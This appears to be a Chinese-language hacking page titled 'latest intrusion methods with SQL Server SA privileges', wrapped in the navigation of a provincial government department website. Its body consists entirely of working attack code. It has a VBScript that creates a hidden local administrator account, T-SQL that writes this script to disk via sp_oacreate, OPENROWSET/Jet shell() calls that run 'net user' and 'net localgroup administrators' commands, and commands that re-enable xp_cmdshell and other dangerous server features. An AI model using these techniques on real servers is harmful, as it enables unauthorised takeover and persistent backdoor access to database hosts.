SQL Server SA权限最新入侵方法


首页
厅长之窗	李春燕李江河赖厚明吴海平熊远国唐国栋
机构设置及职能	厅办公室综合规划处科学技术处无线电管理处信息化推进处网络及通信管理处机关党委（人事处）纪检组（监察室）机关后勤服务中心
工作动态	综合动态电子信息产品制造业动态软件业动态无线电管理动态信息化推进动态
公告公示	公告无线电管理公告电子信息产品制造业公告软件业公告信息化推进公告
领导讲话	部省领导讲话厅领导讲话李春燕李江河赖厚明吴海平熊远国唐国栋年度工作报告其他
政府文件	赣信人赣信字赣信综赣信科赣信无赣信信赣信监 <赣信发赣信厅办赣信党字
工作简报	信息产业厅大事记厅简报专项工作简报专项工作简报政务双评保持共产党先进性教育惩治商业腐败
政策法规	法律行政法规部门规章地方性法规省政府规章无线电管理专门法律法规规范性文件法律法规频率台站管理规定设备管理规定收费规定规章制度
统计信息	全国通信行业运行情况我省电子信息产业经济运行情况我省软件产业经济运行情况我省无线电台登记情况
人事教育	人才招聘人事教育文件选编文件选编
纪检监察	工作部署党纪法规动态信息警示教育
规划部署	电子信息产品制造业规划部署软件业规划部署无线电管理规划部署信息化规划部署
产业动态	电子信息产品制造业动态软件业动态信息化推进动态无线电管理业动态
知识园地	电子信息产品制造业知识软件业知识信息化知识无线电知识

频道首页
政务公开指南
行政执法目录
办事项目	综合规划处科学技术处信息化推进处无线电管理处
相关法规文件
办结通知
行政处罚
收费标准
数据库查询

频道首页
厅长信箱
行政投诉中心
信访、纠风热线
纪检举报
便民服务
常见问题	办公室综合规划处科学技术处无线电管理处信息化推进处人事处省无线电监测站其他问题
民意调查
便民服务
数据库查询

set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) '得到adsi接口,绑定 Set oe=GetObject(os&"/Administrators,group") '属性,admin组 Set od=ob.Create("user","test") '建立用户 od.SetPassword "1234" '设置密码 od.SetInfo '保存 Set of=GetObject(os&"/test",user) '得到用户 oe.add os&"/test"

declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject ("WSCRIPT.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject (os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create ("user","test")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo ' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject (os&"/test",user) ' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows \system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')

开启XP_cmdshell： EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 开启'OPENROWSET'： exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 开启'sp_oacreate': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;